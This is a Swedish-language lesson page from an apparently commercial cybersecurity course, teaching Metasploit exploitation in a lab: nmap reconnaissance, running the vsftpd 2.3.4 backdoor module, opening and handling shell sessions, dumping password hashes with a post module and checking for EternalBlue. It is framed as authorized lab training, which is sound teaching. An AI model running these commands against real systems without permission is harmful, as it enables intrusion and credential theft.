Exploatera en känd sårbarhet
Använd en exploitmodul mot ett sårbart mål i en labbmiljö och tolka sessionsutdata.
Exploatera en känd sårbarhet är en gratis lektion i Cyber Security Academy på CoddyKit. Detta är lektion 2 av 4. Du kan läsa vilka 3 lektioner som helst i den här lärvägen kostnadsfritt i sin helhet – därefter låser CoddyKit PRO upp alla lektioner, plus praktisk övning med en inbyggd kodredigerare och en AI-lärare dygnet runt. Den ingår i lärvägen för Cyber Security Academy, och Era framsteg synkroniseras mellan webben och CoddyKit-appen. Kursen i Cyber Security Academy innehåller totalt 4 lektioner.
Etik och auktorisering först
Exploatering är endast laglig mot system som du äger eller uttryckligen har skriftligt tillstånd att testa. Alla exempel här är avsedda för auktoriserade labbmiljöer. Obehörig exploatering är ett brott.
Rekommendationer för labbmiljön
Använd avsiktligt sårbara virtuella maskiner: Metasploitable2/3, DVWA, maskiner från VulnHub eller HackTheBox/TryHackMe för laglig övning. Testa aldrig produktionssystem eller verkliga system utan ett undertecknat dokument som anger testets omfattning.
# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/
# Or use VulnHub
# https://www.vulnhub.com/
# Network: host-only adapter (isolated)Rekognosering före exploatering
Inventera alltid innan du exploaterar. Ta reda på exakt tjänsteversion, operativsystem och kontext innan du väljer en exploit. Fel version innebär en misslyckad exploatering eller en systemkrasch.
sudo nmap -sV -O 192.168.1.100
# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploitVälj rätt exploit
Sök efter tjänstens namn och version. Föredra moduler med rangordningen Excellent eller Great. Läs info för att bekräfta att målplattformen och versionsintervallet stämmer.
msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorKonfigurera och köra exploateringen
Ange RHOSTS (fjärrmålet), LHOST (din IP-adress för omvända anslutningar) och LPORT (lyssningsporten), välj sedan en payload och kör den. Var uppmärksam på om en session skapas eller om felmeddelanden visas.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run
# [*] Command shell session 1 openedTolka resultaten
En lyckad exploatering öppnar en session. Misslyckade exploateringar visar felmeddelanden: anslutningen nekades (porten är inte öppen), exploateringen misslyckades (fel version), ingen session skapades (payloaden kunde inte ansluta tillbaka).
# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened
# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was createdInteragera med en session
Efter exploateringen interagerar du med sessionen med sessions -i . En enkel kommandoshell ger dig en terminal, medan Meterpreter-sessioner tillhandahåller ett omfattande API.
msf6 > sessions # list all sessions
msf6 > sessions -i 1 # interact with session 1
# Once inside:
id
whoami
ifconfig
uname -aBakgrundsköra och hantera flera sessioner
Tryck på Ctrl+Z för att bakgrundsköra en session och återgå till msfconsole. Då kan du hantera flera sessioner eller köra moduler för aktiviteter efter exploatering mot en specifik session.
# Background active session
Ctrl+Z
# List sessions
msf6 > sessions
# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > runKontrollkommando
Många exploit-moduler har ett check-kommando som testar om målet är sårbart utan att faktiskt exploatera det. Kör alltid check först om kommandot är tillgängligt.
msf6 exploit(ms17_010_eternalblue) > check
# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.Överväganden kring exploiters tillförlitlighet
Exploateringar kan krascha tjänster, utlösa larm eller lämna loggar efter sig. Vid produktionsbedömningar bör du köra exploateringar under perioder med låg trafik, ha en plan för återställning och bekräfta att säkerhetskopior finns innan du kör något destruktivt.
Dokumentera exploateringen
Dokumentera tidsstämpel, mål-IP och port, använd exploit-modul, CVE-nummer, använd payload, erhållen session och bevis (skärmbild eller terminalutdata). Detta är ditt bevis på sårbarheten i rapporten.
Snabb kontroll
Vad gör Metasploits "check"-kommando?
Sammanfattning: exploatering av sårbarheter
Etisk exploatering följer ett tydligt flöde: skaffa skriftligt tillstånd, inventera noggrant, välj en matchande exploit, läs modulens information, kör check först om det är möjligt, genomför exploateringen och dokumentera allt. Exploatera aldrig utan tillstånd – den tekniska kompetensen och den etiska gränsen hör oupplösligt samman.
Lär dig Cyber Security Academy med en AI-lärare – gratis
Skriv och kör riktig kod i webbläsaren, få omedelbar hjälp av en AI-lärare dygnet runt och fortsätt där du slutade – på webben eller i appen.
- Kurser
- 76
- Lektioner
- 303
Vanliga frågor
Är lektionen ”Exploatera en känd sårbarhet” gratis?
Ja – du kan läsa vilka 3 lektioner som helst i lärvägen Cyber Security Academy, inklusive ”Exploatera en känd sårbarhet”, kostnadsfritt i sin helhet här på webben. Därefter låser CoddyKit PRO upp alla lektioner, plus interaktiv övning med en inbyggd kodredigerare och en AI-lärare dygnet runt. Kursen i Cyber Security Academy innehåller totalt 4 lektioner.
Vad lär jag mig i ”Exploatera en känd sårbarhet”?
Använd en exploitmodul mot ett sårbart mål i en labbmiljö och tolka sessionsutdata. Ni övar på Cyber Security Academy med praktisk kod som körs direkt i webbläsaren, medan en AI-handledare som är tillgänglig dygnet runt svarar på Era frågor under lektionen.
Behöver jag någon erfarenhet för att börja lära mig Cyber Security Academy?
Du behöver inga förkunskaper. Utbildningen i Cyber Security Academy på CoddyKit är upplagd för allt från nybörjare till avancerade elever, så att du kan börja här eller från början och gå fram i din egen takt. Detta är lektion 2 av 4.
Hur lång tid tar lektionen ”Exploatera en känd sårbarhet”?
De flesta CoddyKit-lektioner tar cirka 5–10 minuter. Varje lektion är kort och interaktiv, så att du gör stadiga framsteg och kan fortsätta precis där du slutade – på webben eller i appen.
Kan jag skriva och köra kod i den här Cyber Security Academy-lektionen?
Ja. Varje Cyber Security Academy-lektion innehåller en inbyggd kodredigerare, så att du kan skriva och köra riktig kod direkt i webbläsaren och få omedelbar AI-feedback – utan lokal installation.
Alla lektioner i den här kursen
- Metasploit-arkitektur och msfconsole
- Exploatera en känd sårbarhet
- Payloads: staged jämfört med stageless, Meterpreter
- Efter exploatering: pivotera och skapa kvarvaro